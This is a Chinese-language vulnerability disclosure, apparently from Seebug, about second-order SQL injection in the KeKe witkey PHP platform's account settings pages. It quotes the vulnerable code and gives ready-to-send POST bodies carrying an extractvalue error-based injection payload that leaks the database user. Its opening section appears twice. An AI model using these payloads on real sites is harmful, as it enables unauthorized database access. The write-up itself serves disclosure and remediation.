### 简要描述: 二次注入。 ### 详细说明: #1 /www/control/user/account_basic.php ``` ..... $arrMemberExts = kekezu::get_table_data ( "*", "witkey_member_ext", " type='sect' and uid= ".$gUid, "", "", "", "k" ); ........ if ($sect) { foreach ( $sect as $k => $v ) { if ($arrMemberExts [$k]) db_factory::execute ( sprintf ( " update %switkey_member_ext set v1='%s' where k='%s' and uid='%d'", TABLEPRE, $v, $k, $gUid ) ); else { $ext_obj = new Keke_witkey_member_ext_class (); $ext_obj->setK ( $k ); $ext_obj->setV1 ( kekezu::escape ( $v ) ); $ext_obj->setUid ( $gUid ); $ext_obj->setType ( 'sect' ); $ext_obj->create_keke_witkey_member_ext (); } } } ``` 跟到create_keke_witkey_member_ext() ``` function create_keke_witkey_member_ext(){ $data = array(); if(!is_null($this->_ext_id)){ $data['ext_id']=$this->_ext_id; } if(!is_null($this->_uid)){ $data['uid']=$this->_uid; } if(!is_null($this->_k)){ $data['k']=$this->_k; } if(!is_null($this->_v1)){ $data['v1']=$this->_v1; } if(!is_null($this->_v2)){...
### 简要描述: 二次注入。 ### 详细说明: #1 /www/control/user/account_basic.php ``` ..... $arrMemberExts = kekezu::get_table_data ( "*", "witkey_member_ext", " type='sect' and uid= ".$gUid, "", "", "", "k" ); ........ if ($sect) { foreach ( $sect as $k => $v ) { if ($arrMemberExts [$k]) db_factory::execute ( sprintf ( " update %switkey_member_ext set v1='%s' where k='%s' and uid='%d'", TABLEPRE, $v, $k, $gUid ) ); else { $ext_obj = new Keke_witkey_member_ext_class (); $ext_obj->setK ( $k ); $ext_obj->setV1 ( kekezu::escape ( $v ) ); $ext_obj->setUid ( $gUid ); $ext_obj->setType ( 'sect' ); $ext_obj->create_keke_witkey_member_ext (); } } } ``` 跟到create_keke_witkey_member_ext() ``` function create_keke_witkey_member_ext(){ $data = array(); if(!is_null($this->_ext_id)){ $data['ext_id']=$this->_ext_id; } if(!is_null($this->_uid)){ $data['uid']=$this->_uid; } if(!is_null($this->_k)){ $data['k']=$this->_k; } if(!is_null($this->_v1)){ $data['v1']=$this->_v1; } if(!is_null($this->_v2)){ $data['v2']=$this->_v2; } if(!is_null($this->_v3)){ $data['v3']=$this->_v3; } if(!is_null($this->_v4)){ $data['v4']=$this->_v4; } if(!is_null($this->_v5)){ $data['v5']=$this->_v5; } if(!is_null($this->_type)){ $data['type']=$this->_type; } return $this->_ext_id = $this->_db->inserttable($this->_tablename,$data,1,$this->_replace); } ``` 对于 post传入的 sect数组,先判断其键是否存在,存在则update,不存在就insert。 这里就出问题了,如果我们先提交sect[1'] 会insert values('1\'') 再重复提交一次的话, 就会进入update了,单引号就带进来了。 注册用户, index.php?do=user&view=account&op=basic post两次数据: ``` formhash=00a201&pk%5Buid%5D=10&is_perfect=1&indus_pid=-1&indus_id=-1&truename=%E5%98%89%E5%AE%A2&sex=-1&birthday=2015-09-09&email=a%**.**.**.**§%5Bemail%5D=1&mobile=18615478859§%5B1'and extractvalue(1,concat(0x5c,user()))#%5D=12222&qq=123213213§%5Bqq%5D=1&msn=§%5Bmsn%5D=1&phone=§%5Bphone%5D=1&province=p&city=c&area=a ``` [<img src="https://images.seebug.org/upload/201509/1701105846350b0495065cfdd23a6f402b920fee.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/1701105846350b0495065cfdd23a6f402b920fee.png) #2 /www/control/user/account_contact.php ``` if($gUserInfo['city']){ $arrCity = CommonClass::getDistrictByPid($gUserInfo['province'],'id,upid,name'); } if($gUserInfo['area']){ $arrArea = CommonClass::getDistrictByPid($gUserInfo['city'],'id,upid,name'); } if (isset($formhash)&&kekezu::submitcheck($formhash)) { if($gUserInfo['uid'] != $pk['uid']){ kekezu::show_msg('无权操作',NULL,NULL,NULL,'error'); return false; } $arrData =array( 'email'=>$email, 'mobile'=>$mobile, 'qq'=>$qq, 'msn'=>$msn, 'phone'=>$phone, 'province'=>$province, 'city'=>$city, 'area'=>$area ); $intRes = $objSpaceT->save($arrData,$pk); if ($sect) { foreach ( $sect as $k => $v ) { if ($arrMemberExts [$k]) db_factory::execute ( sprintf ( " update %switkey_member_ext set v1='%s' where k='%s' and uid='%d'", TABLEPRE, $v, $k, $gUid ) ); else { $ext_obj = new Keke_witkey_member_ext_class (); $ext_obj->setK ( $k ); $ext_obj->setV1 ( kekezu::escape ( $v ) ); $ext_obj->setUid ( $gUid ); $ext_obj->setType ( 'sect' ); $ext_obj->create_keke_witkey_member_ext (); } } ``` 前面的条件全满足即可注入。 /index.php?do=user&view=account&op=contact post: ``` formhash=01b251&pk%5Buid%5D=10&is_perfect=1&indus_pid=-1&indus_id=-1&truename=%E5%98%89%E5%AE%A2&sex=-1&birthday=2015-09-09&email=a%**.**.**.**§%5Bemail%5D=1&mobile=18615478859§%5B1'and extractvalue(1,concat(0x5c,user()))#%5D=12222&qq=123213213§%5Bqq%5D=1&msn=§%5Bmsn%5D=1&phone=§%5Bphone%5D=1&province=p&city=c&area=a ``` [<img src="https://images.seebug.org/upload/201509/17011416e2743f2874cc1966f8b5605b8f0cd470.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/17011416e2743f2874cc1966f8b5605b8f0cd470.png) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201509/17011416e2743f2874cc1966f8b5605b8f0cd470.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/17011416e2743f2874cc1966f8b5605b8f0cd470.png) [<img src="https://images.seebug.org/upload/201509/1701105846350b0495065cfdd23a6f402b920fee.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/1701105846350b0495065cfdd23a6f402b920fee.png)